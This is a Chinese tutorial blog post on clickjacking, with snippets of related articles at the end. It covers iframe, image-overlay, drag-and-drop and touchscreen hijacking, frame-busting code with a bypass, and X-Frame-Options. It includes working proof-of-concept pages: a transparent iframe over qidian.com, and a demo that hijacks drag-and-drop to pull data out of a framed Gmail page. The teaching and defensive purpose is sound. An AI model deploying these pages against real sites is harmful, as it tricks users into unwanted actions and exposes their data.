web安全之点击劫持

点击劫持(clickjacking)

点击劫持最早是在08年由安全专家Reboot Hansen和Jeremiah Grossman发现,这种攻击方式影响了几乎所有的桌面平台。那么什么是点击劫持??点击劫持其实是一种视觉上的欺骗手段,攻击者将一个透明的、不可见的iframe覆盖在一个网页上,通过调整iframe页面位置,诱使用户在页面上进行操作,在不知情的情况下用户的点击恰好是点击在iframe页面的一些功能按钮上。比如转账,刷粉,下载。。。。等
      为了理解clickjacking,我们先来看看页面覆盖代码如下:
      <!DOCTYPE html>
      <html>
       <head>
        <title>CLICK JACK!!!</title>
        <style>
        iframe {
         width: 900px;
         height: 250px;
              /* Use absolute positioning to 
line up update button with fake button */
              position: absolute;
         top: -195px;
         left: -740px;
         z-index: 2;
              /* Hide from view */
              -moz-opacity: 0.5;
         opacity: 0;
         filter: alpha(opacity=0.5);
        }
        button {
         position: absolute;
         top: 10px;
         left: 10px;
         z-index: 1;
         width: 120px;
        }
        </style>
       </head>
       <body>
        <iframe src="http://www.qidian.com" 
scrolling="no"></iframe>
        <button>CLICK HERE!</button>
       </body>
      </html>
攻击者通过调整iframe的height、width、top、left的值就可以把iframe页面任意部分覆盖到任何地方。再设置iframe的position的值为absolute,将Z-index值设置为最大,那么iframe就会处于页面的最上层。opacity是控制iframe透明度,0为完全透明。这样,一个完全透明的clickjacking页面就神不知鬼不觉的覆盖在用户访问的正常页面上。

Flash点击劫持

点击劫持与CSRF攻击有异曲同工之妙,他们都是在用户不知情的情况下诱使用户完成一些动作。CSRF在攻击过程中果出现与用户交互的页面,则攻击有可能无法完成。而点击劫持恰恰是利用与用户交互而完成的攻击,因此在Flash中这类点击劫持现象更为严重。攻击者利用简单的Flash小游戏诱使用户点击,经过一系列点击后达到控制用户电脑的目的。

图片覆盖攻击
由于点击劫持的本质是一种视觉欺骗,那么采用图片覆盖也可起到类似作用,简称XSIO(cross site image overiaying)。这种攻击通过调整图片的style使得图片可以覆盖在指定位置。如果攻击者将图片伪装成一个正常的链接、按钮或者在图片中构造一些文字覆盖在关键字位置,这样就完全改变了开发者所表达的意思,此时不需要用户点击也可达到欺骗目的。
      <img>标签在很多系统中是对用户开放的,因此在现实中非常多的站点存在被XSIO攻击的可能。一般通过检查用户提交的HTML代码中的<img>标签style属性是否可能导致浮出来防御XSIO攻击。

拖拽劫持与数据窃取
 目前很多浏览器都支持Drag&Drop的API,这对于用户来说拖拽的操作更加简单,不管是一个链接、一段文字、或者从一个窗口拖拽到另外一个窗口,因此拖拽是不受同源策略的限制。拖拽劫持的思路是诱使用户从隐藏不可见的iframe中拖拽出攻击者希望得到的数据放到攻击者能控制的另外一个页面中,达到窃取数据的目的。
      附上安全研究者xisigr的小游戏源代码,有机会可以研究研究:
<html>
  <head>
    <title>
      Gmail Clickjacking with drag and drop 
Attack Demo
    </title>
    <style>
      .iframe_hidden{height: 50px; width: 
50px; top:360px; left:365px; overflow:hidden;
      filter: alpha(opacity=0); opacity:.0; 
position: absolute; } .text_area_hidden{
      height: 30px; width: 30px; top:160px; 
left:670px; overflow:hidden; filter:
      alpha(opacity=0); opacity:.0; 
position: absolute; } .ball{ top:350px; 
left:350px;
      position: 
absolute; } .ball_1{ top:136px; left:640px; 
filter: alpha(opacity=0);
      opacity:.0; position: 
absolute; }.Dolphin{ top:150px; left:600px; 
position:
      absolute; }.center{ margin-right: 
auto;margin-left: auto;
vertical-align:middle;text-align:center;
      margin-top:350px;}
    </style>
    <script>
      function Init() {
        var source = 
document.getElementById("source");
        var target = 
document.getElementById("target");
        if (source.addEventListener) {
          target.addEventListener("drop", 
DumpInfo, false);
        } else {
          target.attachEvent("ondrop", 
DumpInfo);
        }
      }
      function DumpInfo(event) {
        showHide_ball.call(this);
        showHide_ball_1.call(this);
        var info = 
document.getElementById("info");
info.innerHTML += "<span 
style=‘color:#3355cc;font-size:13px‘>" +
event.dataTransfer.getData(‘Text‘) + "</
span><br> ";
      }
      function showHide_frame() {
        var iframe_1 = 
document.getElementById("iframe_1");
        iframe_1.style.opacity = 
this.checked ? "0.5": "0";
        iframe_1.style.filter = 
"progid:DXImageTransform.Microsoft.Alpha(opac
ity=" +
(this.checked ? "50": "0") + ");"
      }
      function showHide_text() {
        var text_1 = 
document.getElementById("target");
        text_1.style.opacity = 
this.checked ? "0.5": "0";
        text_1.style.filter = 
"progid:DXImageTransform.Microsoft.Alpha(opac
ity=" +
(this.checked ? "50": "0") + ");"
      }
      function showHide_ball() {
        var hide_ball = 
document.getElementById("hide_ball");
        hide_ball.style.opacity = "0";
        hide_ball.style.filter = 
"alpha(opacity=0)";
      }
      function showHide_ball_1() {
        var hide_ball_1 = 
document.getElementById("hide_ball_1");
        hide_ball_1.style.opacity = "1";
        hide_ball_1.style.filter = 
"alpha(opacity=100)";
      }
      function reload_text() {

document.getElementById("target").value = ‘‘;
      }
    </script>
  </head>
  <body >
    <center>
      <h1>
        Gmail Clickjacking with drag and 
drop Attack
      </h1>
    </center>
    <img id="hide_ball" src=ball.png 
class="ball">
    <div id="source">
      <iframe id="iframe_1" 
src="https://mail.google.com/mail/ig/mailmax"
class="iframe_hidden"
      scrolling="no">
      </iframe>
    </div>
    <img src=Dolphin.jpg class="Dolphin">
    <div>
      <img id="hide_ball_1" src=ball.png 
class="ball_1">
    </div>
    <div>
      <textarea id="target" 
class="text_area_hidden">
      </textarea>
    </div>
    <div id="info" 
style="position:absolute;background-
color:#e0e0e0;font-weight:bold;
top:600px;">
    </div>
    <center>
      Note: Clicking "ctrl + a" to select 
the ball, then drag it to the
      <br>
      mouth of the dolphin with the 
mouse.Make sure you have logged into GMAIL.
      <br>
    </center>
    <br>
    <br>
    <div class="center">
      <center>
        <center>
          <input id="showHide_frame" 
type="checkbox"
onclick="showHide_frame.call(this);"
          />
          <label for="showHide_frame">
            Show the jacked I--Frame
          </label>
          |
          <input id="showHide_text" 
type="checkbox" 
onclick="showHide_text.call(this);"
          />
          <label for="showHide_text">
            Show the jacked Textarea
          </label>
          |
          <input type=button value="Replay" 
onclick="location.reload();reload_text();">
        </center>
        <br><br>
        <b>
          Design by
          <a target="_blank" 
href="http://hi.baidu.com/xisigr">
            xisigr
          </a>
        </b>
      </center>
    </div>
  </body>
</html>

触屏劫持
      随着触屏技术的发展,clickjacking的攻击方式也更进一步,10年斯坦福公布触屏劫持攻击。触屏劫持的原理:首先分析一次触屏操作可能会有一下几个事件:
      touchstart   手指触摸屏幕时发生
      touchend     手指离开屏幕时发生
      touchmove    手指滑动时发生
      touchcancel  系统可取消touch事件
通过将一个不可见的iframe覆盖到当前网页上就可以劫持用户的触屏操作。手机屏幕范围有限,手机浏览器为了节省空间把地址栏隐藏起来,因此在手机上的视觉欺骗更容易实施。

clickjacking的防御

clickjacking其实就是一种视觉上的欺骗,一般通过禁止跨域的iframe来防范。

方法一,通过写一段javascript代码来禁止iframe的嵌套,这种方法叫frame busting,如:
      if ( top.location != location ) {
          top.location = self.location;
      }
常见的frame busting有一下方式:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && 
parent.frames.length>0)
if((self.parent&&!
(self.parent===self))&&(self.parent.frames.le
ngth!=0))
top.location = self.location
top.location.href = document.location.href
top.location.href = self.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write(‘‘)
top.location = location
top.location.replace(document.location)
top.location.replace(‘URL‘)
top.location.href = document.location
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
parent.location = self.location ;
}
话说强中自有强中手,一山还有一山高,通过一下方式即可绕过上面的保护代码:
Attacker top frame:
<iframe src="attacker2 .html">
Attacker sub-frame:
<iframe src="http://www.victim.com">

方法二,由于frame busting存在被绕过的可能性,因此研究者们由想到了一个比较好的方法:使用http头————X-frame-option,它有三个可选值
       DENY               拒绝浏览器加载任何frame页面
       SAMEORIGIN         frame页面地址只能是同源域名下的页面
       ALLOW-FROM origin  可自定义允许frame加载页面地址
除此之外有的浏览器厂商也增加扩展功能来防御clickjacking,如firefox的"content security policy"和"No-script"

时间: 2024-10-09 00:07:03

web安全之点击劫持的相关文章

Web安全之点击劫持(ClickJacking)

点击劫持(ClickJacking)是一种视觉上的欺骗手段.大概有两种方式,一是攻击者使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在该页面上进行操作,此时用户将在不知情的情况下点击透明的iframe页面:二是攻击者使用一张图片覆盖在网页,遮挡网页原有位置的含义: iframe覆盖 直接示例说明 1. 假如我们在百度有个贴吧,想偷偷让别人关注它.于是我们准备一个页面: <!DOCTYPE HTML> <html> <meta http-equiv="Co

《白帽子讲WEB安全》学习笔记之第5章 点击劫持(clickjacking)

第5章 点击劫持(clickjacking) 5.1 什么是点击劫持 点击劫持是一种视觉上的欺骗手段.是一种在网页中将恶意代码等隐藏在看似无害的内容(如按钮)之下,并诱使用户点击的手段. 主要特征 q  点击劫持是一种恶意攻击技术,用于跟踪网络用户,获取其私密信息或者通过让用户点击看似正常的网页来远程控制其电脑.很多浏览器和操作平台都有这样的漏洞. q  点击劫持技术可以用嵌入代码或者文本的形式出现,在用户毫不知情的情况下完成攻击,比如点击一个表面显示是"播放"某个视频的按钮,而实际上

web安全:防范点击劫持的两种方式

防范点击劫持的两种方式 什么点击劫持?最常见的是恶意网站使用 <iframe> 标签把我方的一些含有重要信息类如交易的网页嵌入进去,然后把 iframe 设置透明,用定位的手段的把一些引诱用户在恶意网页上点击.这样用户不知不觉中就进行了某些不安全的操作. 有两种方式可以防范: 使用 JS 防范: if (top.location.hostname !== self.location.hostname) { alert("您正在访问不安全的页面,即将跳转到安全页面!"); t

点击劫持漏洞

0x01:什么是点击劫持 点击劫持是一种视觉上的欺骗手段,攻击者使用一个透明的.不可见的iframe,覆盖在一个网页上,然后诱使用户在该网页上进行操作,此时用户在不知情的情况下点击了透明的iframe页面.通过调整iframe页面的位置,可以诱使用户恰好点击在iframe页面的一些功能性按钮上,攻击者常常配合社工手段完成攻击. 0x02 漏洞危害 攻击者精心构建的另一个置于原网页上面的透明页面.其他访客在用户毫不知情的情况下点击攻击者的页面从而完成攻击.具体危害取决Web应用. 0x03 POC

百度贴吧点击劫持(可恶意刷粉丝)及解决方案

百度贴吧没考虑点击劫持防御,可造成恶意刷粉丝.估计很多地方都没考虑,还可以继续挖. 点击劫持(ClickJacking)是由互联网安全专家罗伯特.汉森和耶利米.格劳斯在2008年首创的.是一种视觉欺骗手段,在Web端就是Iframe嵌套一个透明不可见的页面,让用户在不知情的情况下,点击攻击者想要欺骗用户点击的位置. 百度贴吧页面没考虑该漏洞,可以导致恶意刷粉丝. 想象一下,我在某个大号下留个劲爆消息,诱导用户到我的域名点击按钮,最后大家都成我贴吧的粉丝了. 我的本地页面代码: <html> &

基于iframe的CFS(Cross Frame Script)和Clickjacking(点击劫持)攻击

攻击原理: CFS攻击(Cross Frame Script(跨框架脚本)攻击)是利用浏览器允许框架(frame)跨站包含其它页面的漏洞,在主框架的代码 中加入scirpt,监视.盗取用户输入. Clickjacking(点击劫持) 则是是一种视觉欺骗手段,在web端就是iframe嵌套一个透明不可见的页面,让用户在不知情的情况下, 点击攻击者想要欺骗用户点击的位置. CFS 和 Clickjacking其实都是基于网页iframe产生的攻击.当没有预防的时候,攻击者可以利用iframe的方式包

ASP.NET MVC 防止前端点击劫持

前端点击劫持的原理:通过向我们的页面中添加Iframe,并将Iframe设置成透明,在页面相应的地方设置一些操作引导,让用户在不知不觉中发送一些请求. 解决前端点击劫持的手段就是在服务器端的响应报文中增加X-Frame-Options配置.X-Frame-Options值有3种: 1.DENY:无论如何不在框架中显示. 2.SAMEORIGIN: 仅在同源域名下的框架中显示. 3.ALLOW-FROM uri:仅在指定域名下的框架中显示. 配置X-Frame-Options的手段也有多种: 1.

XSS学习笔记(一个)-点击劫持

所谓XSS这个场景被触发XSS地方,在大多数情况下,攻击者被嵌入在网页中(问题)该恶意脚本(Cross site Scripting),这里的攻击始终触发浏览器端,攻击的者的目的.一般都是获取用户的Cookie(能够还原账户登录状态),导航到恶意网址,携带木马,作为肉鸡发起CC攻击.传播XSS蠕虫等. 整体分为三类: Dom-Based(Dom式) Stroed-Based(存储式) Reflex-Based(反射式) 简单举一个场景: 在一个页面有一个textbox 代码就是<input ty

ClickJacking(点击劫持)

问题: 点击劫持(ClickJacking)是一种视觉上的欺骗手段.大概有两种方式,一是攻击者使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在该页面上进行操作,此时用户将在不知情的情况下点击透明的iframe页面:二是攻击者使用一张图片覆盖在网页,遮挡网页原有位置的含义: iframe覆盖 直接示例说明 1. 假如我们在百度有个贴吧,想偷偷让别人关注它.于是我们准备一个页面: DOCTYPE HTML><html><meta http-equiv="Conte